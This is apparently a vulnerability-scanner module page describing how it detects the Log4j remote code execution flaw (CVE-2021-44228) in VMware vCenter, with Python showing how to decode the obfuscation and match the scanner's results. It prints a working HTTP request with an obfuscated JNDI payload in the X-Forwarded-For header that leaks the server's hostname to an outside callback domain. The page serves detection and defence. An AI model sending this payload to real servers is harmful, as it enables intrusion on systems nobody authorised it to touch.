
VMware VCenter - Remote Code Execution (Apache Log4j)

By kannthu

Severity: Critical
Vidoc Module
Tags: #cve #cve2021 #rce #jndi #log4j
Description

What is the "VMware VCenter - Remote Code Execution (Apache Log4j)" module?

The "VMware VCenter - Remote Code Execution (Apache Log4j)" module is designed to detect a vulnerability in VMware VCenter that allows remote code execution through the Apache Log4j logging library. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute arbitrary code and obtain sensitive information.

Impact

If successfully exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary code on the affected system, leading to potential data breaches, unauthorized access, and system compromise. It is crucial to address this vulnerability promptly to prevent any potential damage.

How does the module work?

The module works by sending HTTP requests to the target VMware VCenter system and applying specific matching conditions to the resulting out-of-band interaction to identify the presence of the vulnerability. One example of an HTTP request used by the module is:

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <Hostname>
X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}

The module uses two matching conditions to determine if the vulnerability is present:

- The first condition checks for the presence of the "dns" protocol in the interaction.
- The second condition uses a regular expression to match a specific pattern in the interaction request.

If both conditions are met, the module reports the vulnerability, indicating the need for immediate action to mitigate the risk.
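The following is an added example, not Vidoc's own module code, showing the two sides of the detection described above from a defender's point of view: first, how the nested `${lower:...}` wrappers in the request's X-Forwarded-For header decode to a plain `${jndi:dns://...}` lookup (so a log filter that only searches for the literal string `${jndi:` would miss it), and second, how the module's two matching conditions are applied to an out-of-band interaction record. The header values, the interaction record, the interaction domain `oob.example.invalid` and the regular expression `INTERACTION_RE` are all constructed or hypothetical stand-ins; the module's real regex is truncated on this page and is not reproduced here.

```python
import re

# Constructed sample header values (not captured from any real scan or target).
# The first uses the same ${lower:...} nesting as the module's request; the
# second is an ordinary proxy header that must not trigger.
SAMPLE_HEADERS = [
    "${jndi:${lower:d}n${lower:s}://${env:hostName}.oob.example.invalid}",
    "203.0.113.7, 198.51.100.2",
]

# ${lower:x} / ${upper:x} lookups whose body contains no further lookup.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
# Once normalised, a JNDI lookup names its protocol directly after "jndi:".
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize_lookups(value: str) -> str:
    """Resolve ${lower:}/${upper:} wrappers from the inside out until the
    string stops changing; other lookups such as ${env:...} are left alone."""
    previous = None
    while previous != value:
        previous = value
        value = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            value,
        )
    return value


def jndi_protocol(value: str):
    """Return the protocol named by a JNDI lookup in a header value, or None
    when the (normalised) value contains no JNDI lookup at all."""
    m = _JNDI.search(normalize_lookups(value))
    return m.group(1).lower() if m else None


# Constructed interaction record in the shape the two matching conditions need:
# the protocol of the out-of-band callback and the name that was looked up.
# "vcenter01.corp.example" plays the role of the leaked ${env:hostName} value.
SAMPLE_INTERACTION = {
    "protocol": "dns",
    "request": "vcenter01.corp.example.abc123.oob.example.invalid",
}

# Hypothetical stand-in for the module's regex: leaked host label(s), then the
# per-scan token, then the interaction domain. Not the module's real pattern.
INTERACTION_RE = re.compile(r"^([a-zA-Z0-9.\-]+)\.([a-z0-9]+)\.(oob\.example\.invalid)$")


def module_matches(interaction: dict):
    """Apply both conditions: the protocol word must be "dns" AND the request
    must match the regex. Returns the leaked hostname on a match, else None."""
    if interaction.get("protocol") != "dns":
        return None
    m = INTERACTION_RE.match(interaction.get("request", ""))
    return m.group(1) if m else None


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(repr(header), "->", normalize_lookups(header), "| jndi:", jndi_protocol(header))
    print("module match:", module_matches(SAMPLE_INTERACTION))
```

Two points are worth noting for anyone writing log-based detection for this probe: the normalisation loop has to repeat until nothing changes, because the wrappers can be nested, and the `${env:hostName}` lookup is deliberately left unresolved, since it is the vulnerable target, not the log reader, that would expand it.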

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
and
regex: ([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-...
Passive global matcher
No matching conditions.
On match action
Report vulnerability